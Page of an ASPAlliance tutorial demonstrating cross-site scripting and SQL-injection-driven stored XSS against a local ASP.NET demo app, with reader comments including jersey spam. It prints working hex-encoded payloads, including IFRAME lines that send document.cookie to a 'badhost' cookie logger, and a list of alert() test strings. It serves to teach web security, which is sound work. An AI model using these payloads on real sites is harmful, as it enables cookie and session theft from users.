SQL Injection and Cross-Site Scripting
page 5 of 9
by Bryian Tan
Feedback
Average Rating: This article has not yet been rated.
Views (Total / Last 10 Days): 47163/ 89

Cross-Site Scripting (CSS/XSS) Attack

Definition: Enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users.

Let say we have a login page and it will display an error message for every unsuccessful attempt. The error message is stored within the query string of the URL and later display in the Label control. See figure 11.

Figure 11

Consider this scenario, an anonymous user sends you an email with the following content:

Listing 18

Dear Admin,
There is problem with the login page: 
http://localhost:1234/Sample/LoginPage.aspx?strErr=%22%3E%3C%73%63%72%69%70%74%20%
73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%6
2%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E
%3C%2F%73%63%72%69%70%74%3E   

Or

"There is problem with the login page http://localhost:1234/Sample/LoginPage.aspx" 
with the URL pointing to the above link.

The part of the URL is encoded in Hexadecimal value. When decoded, it will become:

Listing 19

http://localhost:1234/Sample/LoginPage.aspx?strErr=">
<script src="http://localhost:9997/badhost/maliciousscript.js"></script>  

If we let our guard down and click on the link in the email, the browser will execute the malicious scripts. Execute the URL and you should see a pop-up message. Shown below is a script embedded in the query string to steal browser cookies.

Listing 20

http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%76%61%
72%20%73%3D%27%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3
A%6E%6F%6E%65%22%20%53%52%43%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A
%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%63%6F%6F%6B%69%65%6D%6F%6E%73%74%65%72%2E%
61%73%70%78%3F%63%3D%27%2b%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6
F%6B%69%65%29%2b%27%3E%3C%5C%2F%49%46%52%41%4D%45%3E%27%3B%64%6F%63%75%6D%65%6E%74
%2E%77%72%69%74%65%28%73%29%3C%2F%73%63%72%69%70%74%3E

When decoded, it will look like:

Listing 21

http://localhost:1234/Sample/LoginPage.aspx?strErr=<script>var s='<IFRAME 
style="display:none" 
SRC=http://localhost:9997/badhost/cookiemonster.aspx?c='%2bescape(document.cookie)
%2b'><\/IFRAME>';document.write(s)</script>

The script will embed an IFRAME on to the page and pointing to http://localhost:9997/badhost/cookiemonster.aspx with a query string parameter "c". This parameter holds the cookies value created by the "SQLInjection_XSS_Demo" application. To demonstrate this, I created few cookies on the LoginPage.aspx. The cookiemonster.aspx will record all the cookies names and values in the CookieJar.txt.

Listing 22

    void FakeCookies()
    {
        Response.Cookies["email"].Value = "bryian.tan@mydomain.com";
        Response.Cookies["email"].Expires = DateTime.Now.AddDays(1);
 
        Response.Cookies["age"].Value = "22";
        Response.Cookies["age"].Expires = DateTime.Now.AddDays(1);
    }

 

After executing the above URL, we will see the below entries in the CookieJar.txt.

 

Figure 12

So what? What the attacker going to do with my cookies information? Let say the page will store some information in the cookies after successful login attempt. Login using one of the username found in the tbl_users table then refresh the web page. The page will pull out some information from the cookies and display the results on to the page. See below.

 

Figure 13

 

Update table with malicious script

We already know the tables and columns name from the previous example.  Execute the URL shown in listing 23 to update the MyComment table with a JavaScript to tamper the cookies. This script will inject a script into the cookies value. Then navigate to the ListComments.aspx page to trigger the script and navigate back to LoginPage.aspx. You should see a popup message "XSS from bad host" indicates that the script was successfully executed by the browser.

 

Listing 23

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments 
SET Comment = %27<scriptc="\<script 
src=\">http://localhost:9997/badhost/maliciousscript.js\"><\/script>"; 
document.cookie = "email="%2bc;</script> test %27 WHERE id =1 --

Let append some malicious scripts to the MyComment table. Execute the URL shown below.

Listing 24

http://localhost:1234/Sample/ListComments.aspx?cid=1 
%55%50%44%41%54%45%20%4D%79%43%6F%6D%6D%65%6E%74%73%20%53%45%54%20%4E%61%6D%65%3D%
27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6
F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63
%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%20%2D%2D

The URL string, which when decoded, will become

Listing 25

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments 
SET Name='<script 
src="http://localhost:9997/badhost/maliciousscript.js"></script>' --

Refresh the page, and we will see a popup message shown below. This indicates that the malicious script crafted by the attacker was successfully executed by the browser.

Figure 14

The URL shown below will embed a HTML IFRAME on to the page and will trigger the cookiemonster.aspx page every time a user navigates to the ListComments.aspx page. Execute it, navigate to ListComments.aspx page and observe that new contents are being appended to the CookieJar.txt file without a trace or warning message.

Listing 26

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments 
SET Name= '<script>var s="<IFRAME style=display:none 
SRC=http://localhost:9997/badhost/cookiemonster.aspx?c="%2bescape(document.cookie)
%2b"><\/IFRAME>";document.write(s)</script>' --

Quick test

Append any of the below string to your web pages URL that take parameters. If you see a pop-up message, then the web page is subjected to Cross-Site Scripting attack.

http://localhost:1234/Sample/LoginPage.aspx?strErr="><scrIpt>alert("XSS")</scriPt>
 
http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%61%6C%
65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
 
http://localhost:1234/Sample/LoginPage.aspx?strErr=</TITLE><sCRIPT>alert("XSS");</SCRIPt>
 
http://localhost:1234/Sample/LoginPage.aspx?strErr=<BODY%20ONLOAD=alert("XSS")>
 
http://localhost:1234/Sample/LoginPage.aspx?strErr="><iFRAME%20SRC="javascript:ale
rt('XSS');"></IFRaME>

View Entire Article

User Comments

Title: NIKE NFL jerseys   
Name: NIKE NFL jerseys
Date: 2012-07-02 10:09:59 AM
Comment:
http://www.jersey2shop.com
http://www.cheapjersey2store.com
http://www.jerseycaptain.com
http://www.yourjerseyhome.com
We are professional jerseys manufacturer from china,wholesal.cheap nike nfl jerseys, mlb jerseys, nhl jerseys,nba jerseys and shoes
Cheap NFL,NBA,MLB,NHL
,heap jerseys,2012 nike nfl Jerseys,nba jersey and shorts,oklahoma city thunder jersey,official jeremy lin new york knicks jersey,NFL Jerseys Wholesale,blake griffin jersey blue,NFL jerseys For Sale online.All Our Jerseys Are Sewn On and Directly From Chinese Jerseys Factory
,Wholesale cheap jerseys,Cheap mlb jerseys,]Nike NFL Jerseys,Cheap China Wholesae,Wholesale jerseys From China,2012 nike nfl Jerseys,Jerseys From China,,2012 nike nfl Jerseys,Revolution 30 nba jerseys,jersey of nba chicago bulls direk rose ,nfl jerseys,green bay packers jerseys wholesale,Buffalo Bills nike nfl jerseys sale,good supplier soccer jerseys,cool base mlb jerseys,Revolution 30 nba jerseys,2012 stanley cup nhl jersey,
We are professional jerseys manufacturer from china,wholesal.cheap nike nfl jerseys, mlb jerseys, nhl jerseys,nba jerseys and shoes. www.yourjerseyhome.com
Title: SQL Injection and Cross-Site Scripting   
Name: DINESH
Date: 2011-01-18 6:25:25 AM
Comment:
The best SQL Server Site Scripting
Title: avrail   
Name: Refat Eid
Date: 2010-09-19 3:02:00 AM
Comment:
where can i found the TestDBSetup.sql ?
Title: Really Good   
Name: Ankit Shivankar
Date: 2010-09-15 1:04:32 AM
Comment:
its really good.....and easy to understand

dear Bryian ...
M facing some problem in my personal project can u help me..
if u can then plz contact me on mail id that is shiva.ankit@gmail.com
Title: Download Link   
Name: Bryian Tan
Date: 2010-09-14 8:21:24 PM
Comment:
Hello,

Sorry, I think I forgot to include the download link. Anyway, please download the sample code from here http://download.ysatech.com/SQL-Injection-and-Cross-Site-Scripting/Sample_SQLInjection_XSS.zip
Title: Gustavo   
Name: Fernandez
Date: 2010-09-14 3:19:45 PM
Comment:
Where is the link to download the code sample (TestDBSetup.sql)?
Title: Senior programmer/analyst   
Name: Greg Hilsheimer
Date: 2010-09-14 2:16:39 PM
Comment:
where is link to download code






Community Advice: ASP | SQL | XML | Regular Expressions | Windows


©Copyright 1998-2024 ASPAlliance.com  |  Page Processed at 2024-02-27 11:36:53 AM  AspAlliance Recent Articles RSS Feed
About ASPAlliance | Newsgroups | Advertise | Authors | Email Lists | Feedback | Link To Us | Privacy | Search